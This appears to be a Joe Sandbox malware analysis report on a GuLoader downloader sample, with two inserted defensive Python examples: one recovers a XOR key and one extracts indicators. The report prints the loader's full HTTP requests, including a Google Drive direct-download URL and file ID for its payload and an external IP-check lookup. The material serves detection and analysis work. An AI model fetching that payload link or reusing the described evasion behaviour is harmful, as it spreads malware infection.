Windows Analysis Report
4AMVusDMPP.exe

Overview

General Information

Sample name: 4AMVusDMPP.exe (renamed because the original name is a hash value)
Original sample name: 815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a.exe
Analysis ID: 1588355
MD5: ed6f1c14e085e4fbc7c47f894f2140b9
SHA1: 1757c800b765345d51a261e11ebe1d89f05c4865
SHA256: 815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a
Tags: exe, GuLoader, user-adrian__luca

Detection

GuLoader
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • 4AMVusDMPP.exe (PID: 4492 cmdline: "C:\Users\user\Desktop\4AMVusDMPP.exe" MD5: ED6F1C14E085E4FBC7C47F894F2140B9)
    • 4AMVusDMPP.exe (PID: 4216 cmdline: "C:\Users\user\Desktop\4AMVusDMPP.exe" MD5: ED6F1C14E085E4FBC7C47F894F2140B9)
      • WerFault.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
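The Malpedia entry above says the payload GuLoader fetches is XOR-encrypted. The following is an added example, not GuLoader's code and not part of this Joe Sandbox report, of how an analyst can recover a repeating XOR key from such a downloaded blob without the loader's shellcode: the first 0x3C bytes of an MS-linked PE (the MS-DOS header, minus the variable e_lfanew field) and the 0x40-byte standard DOS stub are used as known plaintext, and the shortest key period consistent with them is accepted. The maximum key length, the 7-byte sample key and the minimal sample PE are constructed assumptions; the real key length of this sample is not given by the report, and payloads built with a non-Microsoft linker will have a different stub.

```python
"""Recover a repeating XOR key from an encrypted PE payload.

Added example, not GuLoader's own code. Known plaintext is the MS-DOS
header and stub that the Microsoft linker writes at the start of every PE;
the key length is brute-forced because the report does not give it
(MAX_KEY_LEN is an assumption).
"""
import struct
from typing import Optional

# Offsets 0x00-0x3B of an MS-linked PE are constant; 0x3C-0x3F (e_lfanew)
# vary and are skipped; 0x40-0x7F is the standard DOS stub.
_DOS_HEADER = bytes.fromhex(
    "4D5A90000300000004000000FFFF0000"
    "B8000000000000004000000000000000"
) + b"\x00" * 28
_DOS_STUB = (
    bytes.fromhex("0E1FBA0E00B409CD21B8014CCD21")
    + b"This program cannot be run in DOS mode.\r\r\n$"
    + b"\x00" * 7
)
KNOWN_PLAINTEXT = {i: b for i, b in enumerate(_DOS_HEADER)}
KNOWN_PLAINTEXT.update({0x40 + i: b for i, b in enumerate(_DOS_STUB)})
MAX_KEY_LEN = 64  # assumption: longer keys need more known plaintext


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (encrypt and decrypt are the same)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(blob: bytes, max_key_len: int = MAX_KEY_LEN) -> Optional[bytes]:
    """Shortest key (1..max_key_len bytes) whose repetition explains every
    known plaintext byte. None means no length fits, e.g. the payload is
    not MS-linked or the key is longer than max_key_len."""
    if len(blob) < 0x80:
        return None
    # keystream[off] = ciphertext ^ plaintext = key[off % len(key)]
    keystream = {off: blob[off] ^ pt for off, pt in KNOWN_PLAINTEXT.items()}
    for k in range(1, max_key_len + 1):
        key = [None] * k
        for off, ks in keystream.items():
            slot = off % k
            if key[slot] is None:
                key[slot] = ks
            elif key[slot] != ks:
                break  # two known positions disagree: not period k
        else:
            if None not in key:
                return bytes(key)
    return None


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on a candidate decryption: MZ magic and a PE signature
    at the offset e_lfanew points to."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_payload(blob: bytes) -> Optional[bytes]:
    """Recover the key, decrypt, and return the plaintext only if it
    verifies as a PE; otherwise None."""
    key = recover_xor_key(blob)
    if key is None:
        return None
    plain = xor_bytes(blob, key)
    return plain if looks_like_pe(plain) else None


# Constructed test vector: a minimal PE header (headers only, no sections,
# so it is not runnable) encrypted with a constructed 7-byte key.
SAMPLE_KEY = bytes.fromhex("1337c0debaadf0")
_SAMPLE_PE = (
    _DOS_HEADER + struct.pack("<I", 0x80) + _DOS_STUB
    + b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 250
)
SAMPLE_ENCRYPTED = xor_bytes(_SAMPLE_PE, SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_xor_key(SAMPLE_ENCRYPTED)
    print("recovered key:", key.hex() if key else None)
    print("verifies as PE:", recover_payload(SAMPLE_ENCRYPTED) is not None)
```

On a real download, feed the bytes saved from the drive.usercontent.google.com response into recover_payload; if it returns None, the key is either longer than MAX_KEY_LEN or the payload is not a plain XOR of an MS-linked PE, and the key must instead be read out of the loader's shellcode.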
No configs have been found
Source: 00000000.00000002.1732921065.0000000003541000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: (none listed)
    No Sigma rule has matched
    Timestamp: 2025-01-11T01:15:33.617639+0100
    SID: 2803270
    Severity: 2
    Classtype: Potentially Bad Traffic
    Source: 192.168.2.10:49708
    Destination: 142.250.181.238:443
    Protocol: TCP

    AV Detection

    Source: 4AMVusDMPP.exe | Avira: detected
    Source: 4AMVusDMPP.exe | ReversingLabs: Detection: 60%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: 4AMVusDMPP.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49708 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.10:49709 version: TLS 1.2
    Source: 4AMVusDMPP.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: 6%%.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: HP[o0C:\Windows\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb;bK source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2139339750.0000000036130000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Desktop\4AMVusDMPP.PDB source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Configuration.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Xml.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: Microsoft.VisualBasic.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Windows.Forms.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: Microsoft.VisualBasic.pdb4AMVusDMPP.exe source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: mscorlib.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: mscorlib.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.pdbMZ source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: \??\C:\Users\user\Desktop\4AMVusDMPP.PDB- source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbhb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_0040672B FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_00402868 FindFirstFileW
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 3_2_00402868 FindFirstFileW
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 3_2_0040672B FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: Joe Sandbox View | IP Address: 193.122.130.0
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown | DNS query: name: checkip.dyndns.org
    Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49708 -> 142.250.181.238:443
    Source: global traffic | HTTP traffic detected:
        GET /uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7 HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: drive.google.com
        Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected:
        GET /download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected:
        GET / HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
        Host: checkip.dyndns.org
        Connection: Keep-Alive
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
    Source: global traffic | DNS traffic detected: DNS query: drive.google.com
    Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033634000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.00000000335C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
    Source: 4AMVusDMPP.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.00000000335C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003258000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2117389730.0000000004B40000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003258000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7J
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/~
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
    Source: 4AMVusDMPP.exe, 00000003.00000003.1862365982.0000000003281000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download
    Source: 4AMVusDMPP.exe, 00000003.00000003.1834630972.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862431547.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862365982.0000000003281000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=downloadT
    Source: 4AMVusDMPP.exe, 00000003.00000003.1834630972.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862431547.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862365982.0000000003281000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=downloadcn
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
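The three HTTP requests recorded above carry the network indicators worth extracting from this report: two Google Drive direct-download requests sent with a Firefox 131 User-Agent, and a public-IP lookup against checkip.dyndns.org sent from the same process with an MSIE 6.0 User-Agent. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code, that parses the request strings exactly as the report's export flattens them (request line and headers run together without CRLFs), tags each request, and aggregates the IOCs. The header-name list used to split the flattened text, the tag names and the "MSIE 1 to 8 is legacy" threshold are this example's own assumptions; the three request strings are copied from the report.

```python
"""Pull IOCs out of Joe Sandbox 'HTTP traffic detected' strings.

Added example, not part of the report. The export runs request line and
headers together without CRLFs, so the parser splits on a fixed list of
header names (HEADER_NAMES is an assumption: extend it if a sample sends
other headers). Tag names are this example's own.
"""
import re
from urllib.parse import parse_qs, urlsplit

HEADER_NAMES = (
    "User-Agent", "Host", "Cache-Control", "Connection", "Accept",
    "Accept-Encoding", "Accept-Language", "Referer", "Content-Type",
    "Content-Length",
)
# Zero-width split right before "<Header>: " so each piece is one header.
_HEADER_BOUNDARY = re.compile(
    r"(?=(?:%s):\s)" % "|".join(re.escape(h) for h in HEADER_NAMES)
)
_REQUEST_LINE = re.compile(r"^(\w+)\s+(\S+)\s+HTTP/\d\.\d$")
_DRIVE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
_IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}


def parse_flattened_request(text):
    """Split 'GET /x HTTP/1.1User-Agent: ...Host: ...' into a dict with
    method, target and lower-cased header names."""
    parts = [p for p in _HEADER_BOUNDARY.split(text) if p]
    m = _REQUEST_LINE.match(parts[0].strip())
    if not m:
        raise ValueError("no request line in %r" % parts[0])
    headers = {}
    for raw in parts[1:]:
        name, _, value = raw.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m.group(1), "target": m.group(2), "headers": headers}


def tag_request(req):
    """Return (tags, drive_file_id) for one parsed request."""
    tags = set()
    drive_id = None
    host = req["headers"].get("host", "").lower()
    ua = req["headers"].get("user-agent", "")
    query = parse_qs(urlsplit(req["target"]).query)
    if host in _DRIVE_HOSTS and query.get("export") == ["download"]:
        tags.add("google-drive-direct-download")
        drive_id = query.get("id", [None])[0]
    if host in _IP_CHECK_HOSTS:
        tags.add("external-ip-check")
    if re.search(r"MSIE [1-8]\.", ua):  # assumption: IE <= 8 is legacy
        tags.add("legacy-ie-user-agent")
    return tags, drive_id


def triage(flattened_requests):
    """Aggregate hosts, User-Agents, Drive file IDs and tags across all
    requests of one process; more than one UA from one process is itself
    flagged, since browsers do not switch UA between requests."""
    hosts, agents, drive_ids, tags = set(), set(), set(), set()
    for text in flattened_requests:
        req = parse_flattened_request(text)
        hosts.add(req["headers"].get("host", "").lower())
        agents.add(req["headers"].get("user-agent", ""))
        req_tags, drive_id = tag_request(req)
        tags |= req_tags
        if drive_id:
            drive_ids.add(drive_id)
    if len(agents) > 1:
        tags.add("mixed-user-agents")
    return {"hosts": sorted(hosts), "user_agents": sorted(agents),
            "drive_file_ids": sorted(drive_ids), "tags": sorted(tags)}


# The three requests as they appear in this report (copied verbatim).
REPORT_REQUESTS = [
    "GET /uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache",
    "GET /download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive",
    "GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive",
]

if __name__ == "__main__":
    import json
    print(json.dumps(triage(REPORT_REQUESTS), indent=2))
```

The Drive file ID and the checkip.dyndns.org lookup are the blockable indicators; the two User-Agents are the detection angle. A genuine Internet Explorer UA writes the CLR token as ".NET CLR 1.0.3705" with a space, so the space-less "CLR1.0.3705" in the third request is a cheap exact-match content for a proxy or IDS rule, independent of the Suricata signature that already fired on the Drive download.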
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_00404DCC
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_00406AF2
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_6EAB1B5F
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 3_2_00404DCC
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 3_2_00406AF2
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 3_2_00162DD1
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: String function: 00402C41 appears 49 times
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536
    Source: 4AMVusDMPP.exe, 00000000.00000000.1439243978.0000000000455000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4AMVusDMPP.exe
    Source: 4AMVusDMPP.exe, 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4AMVusDMPP.exe
    Source: 4AMVusDMPP.exe | Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4AMVusDMPP.exe
    Source: classification engine | Classification label: mal76.troj.evad.winEXE@4/13@3/3
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Code function: 0_2_00402104 CoCreateInstance
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | File created: C:\Users\user\AppData\Local\Iw
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Mutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4216
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | File created: C:\Users\user\AppData\Local\Temp\nsw3340.tmp
    Source: 4AMVusDMPP.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | File read: C:\Users\user\Desktop\4AMVusDMPP.exe
    Source: unknown | Process created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Process created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Process created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\4AMVusDMPP.exe | Section loaded: version.dll
